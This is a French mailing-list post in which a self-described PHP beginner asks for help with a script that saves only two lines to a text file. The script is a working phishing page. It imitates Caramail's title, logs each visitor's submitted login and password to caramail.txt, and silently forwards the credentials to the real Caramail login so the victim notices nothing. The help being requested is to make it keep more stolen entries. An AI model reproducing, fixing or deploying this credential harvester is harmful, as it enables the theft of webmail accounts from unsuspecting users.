From: C y b e r T e c h @ L i s t s . E x M a c h i n a . n e t 
<http://www.cybercafe21.net> & <http://www.cybercafe21.tv>

salut,

Voila je debute en PHP ( c'est mon premier script) et je n'arrive pas
à sauver plus de 2 lignes dans un fichier texte ...

Voici la source de mon script :

------------caramail.php3-------------
<html>
<head><title>Caramail : e-mail gratuit, dialogue en direct, forums de 
discussions</title>



<?
// Enregistrement
$fp = fopen("caramail.txt","r+");
$data = fgets($fp,255);
fseek($fp,0);
if($data>"") {
fputs($fp,$data ."\n");
}
fputs($fp,$LOGIN1);
fputs($fp,"        ");
fputs($fp,$PASSWORD1);
?>
</head><body>
<?
// Formulaire
print("<form NAME=Ident ACTION=http://www32.caramail.com/scripts/baltop METHOD=POST>");
print("<input TYPE=hidden SIZE=8 MAXLENGTH=50 NAME=LOGIN1 value=".$LOGIN1 .">");
print("<input TYPE=hidden SIZE=8 MAXLENGTH=50 NAME=PASSWORD1 value=".$PASSWORD1 .">");
// print("<input type=SUBMIT value=Entrer name=Enter>");
print("</form>");

?>
<script language=javascript>
document.Ident.submit()
</script>
</body>

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Best regards :-)
Florent Fievez
[EMAIL PROTECTED]



Des Cadeaux, des avantages et des offres qui vous interessent ?
http://www.justforyou.be... what you want is what you get !
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
CCTK vous est offert par Ex Machina  <http://www.exmachina.net>
Pour vous desabonner <mailto:[EMAIL PROTECTED]>

Répondre à